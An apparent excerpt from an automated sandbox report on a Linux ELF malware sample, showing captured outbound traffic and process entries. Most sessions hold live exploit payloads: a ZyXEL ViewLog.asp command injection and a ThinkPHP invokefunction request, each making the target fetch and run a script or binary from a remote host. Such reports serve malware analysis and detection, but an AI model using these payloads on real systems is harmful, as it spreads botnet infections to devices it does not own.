                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1437192.168.2.144961831.120.194.168080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.133703947 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:15.342082024 CET711INHTTP/1.0 404 Not Found !!!
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1438192.168.2.145865294.110.155.1418080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.140991926 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1439192.168.2.144068294.123.24.1728080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.171758890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1440192.168.2.144741295.179.199.9080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.263467073 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:15.456320047 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:36:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1441192.168.2.144264695.48.26.18680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.326256990 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:15.583322048 CET263INHTTP/1.0 404 Not Found
                                                        Server: httpd
                                                        Date: Wed, 14 Feb 2024 08:36:15 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>URL was not found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1442192.168.2.146048495.57.97.4580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.359131098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:15.648443937 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:36:15.648559093 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1443192.168.2.144447095.59.202.7080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.359966040 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:15.651034117 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:36:15.651290894 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1444192.168.2.144153231.136.49.848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.375961065 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:16.001266003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1445192.168.2.145754062.218.214.428080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.391841888 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:15.614113092 CET599INHTTP/1.1 503 Service Unavailable
                                                        Date: Wed, 14 Feb 2024 08:36:15 GMT
                                                        Server: Apache/2.4.38 (Debian) OpenSSL/1.1.1n
                                                        Retry-After: 18000
                                                        Last-Modified: Tue, 07 Nov 2023 18:29:55 GMT
                                                        ETag: "11f-60994283a8ec0"
                                                        Accept-Ranges: bytes
                                                        Content-Length: 287
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4f 75 72 20 61 70 6f 6c 6f 67 69 65 73 20 66 6f 72 20 74 68 65 20 74 65 6d 70 6f 72 61 72 79 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 67 65 6e 65 72 61 74 65 64 20 35 30 33 20 22 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 22 20 65 72 72 6f 72 20 64 75 65 20 74 6f 20 6f 76 65 72 6c 6f 61 64 69 6e 67 20 6f 72 20 6d 61 69 6e 74 65 6e 61 6e 63 65 20 6f 66 20 74 68 65 20 73 65 72 76 65 72 2e 0a 3c 2f 62 6f 64 79 3e 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Error 503 Service Unavailable</title></head><body><h1>503 Service Unavailable</h1>Our apologies for the temporary inconvenience. The requested URL generated 503 "Service Unavailable" error due to overloading or maintenance of the server.</body>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1446192.168.2.145293694.121.75.1608080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.419683933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1447192.168.2.1455422112.187.129.16080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.641154051 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1448192.168.2.1444688112.170.0.11980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.645740032 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:15.932645082 CET506INHTTP/1.0 400 Bad Request
                                                        Content-Type: text/html
                                                        Content-Length: 349
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:36:15 GMT
                                                        Server: httpd
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 2d 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 - Bad Request</title> </head> <body> <h1>400 - Bad Request</h1> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1449192.168.2.1436102112.197.131.5880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.816987991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:36:16.177769899 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 15:36:15 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1450192.168.2.144267295.48.26.18680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:15.834487915 CET268INHTTP/1.0 400 Bad Request
                                                        Server: httpd
                                                        Date: Wed, 14 Feb 2024 08:36:15 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1451192.168.2.145744494.120.217.1328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:16.207210064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1452192.168.2.144300494.122.227.2128080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:16.704988003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1453192.168.2.145827494.120.225.448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:16.705708981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1454192.168.2.144674295.86.91.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:36:16.714526892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        System Behavior

                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:/tmp/t0X9iGR3pD.elf
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091

                                                        Chronological Activities


                                                        General

                                                        Start time (UTC):08:32:41
                                                        Start date (UTC):14/02/2024
                                                        Path:/tmp/t0X9iGR3pD.elf
                                                        Arguments:-
                                                        File size:70672 bytes
                                                        MD5 hash:a5d66c117a66fe86e146c1ec3022a091